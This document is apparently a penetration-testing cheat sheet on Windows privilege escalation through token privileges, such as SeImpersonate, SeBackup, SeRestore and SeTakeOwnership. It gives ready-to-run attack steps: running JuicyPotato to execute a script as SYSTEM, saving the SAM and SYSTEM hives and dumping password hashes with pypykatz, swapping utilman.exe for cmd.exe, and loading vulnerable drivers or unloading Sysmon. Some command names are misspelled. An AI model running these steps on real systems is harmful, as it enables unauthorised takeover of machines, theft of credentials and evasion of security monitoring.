# PRIVILEGES INFORMATION
| Privilege | Impact | Tool | Execution path | Remarks |
| ---------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| `SeAssignPrimaryToken` | ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. |
| `SeBackup` | **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` | - May be more interesting if you can read %WINDIR%\MEMORY.DMP
- SeBackupPrivilege (and robocopy) is not helpful when it comes to open files.
- Robocopy requires both SeBackup and SeRestore to work with /b parameter.
|
| `SeCreateToken` | ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. | |
| `SeDebug` | ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) |
| `SeLoadDriver` | ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as szkg64.sys or capcom.sys
2. Exploit the driver vulnerability
Alternatively, the privilege may be used to unload security-related drivers with ftlMC builtin command. i.e.: fltMC sysmondrv
| 1. The szkg64 vulnerability is listed as CVE-2018-15732
2. The szkg64 exploit code was created by Parvez Anwar
|
| `SeRestore` | ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
| Attack may be detected by some AV software.
Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
|
| `SeTakeOwnership` | ***Admin*** | ***Built-in commands*** | 1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
| Attack may be detected by some AV software.
Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
|
| `SeTcb` | ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.
To be verified.
| |
* Exploitation Of Each Privilege Mention Above =>
### **SeAssignPrimaryToken/*****SeImpersonatePrivilege*****:**
Get [`Juicy Potato`](https://github.com/ohpe/juicy-potato/releases) on the victim machine And get a [`CLSID`](https://ohpe.it/juicy-potato/CLSID/)for potatoes.
Command to execute a script through a privileged user.
`.\JuicyPotato.exe -t * -p`` `**`c:\path\to\executable.bat`**` ``-l 9002 -c '{`**`CLSID`**`}'`
### SeBackup:
`cd c:\`\
`mkdir Temp` \
`reg save hklm\sam c:\Temp\sam` \
`reg save hklm\system c:\Temp\system`
* Download The Files And use pyptkatz to dump hashes
`pypykatz registry --sam sam system`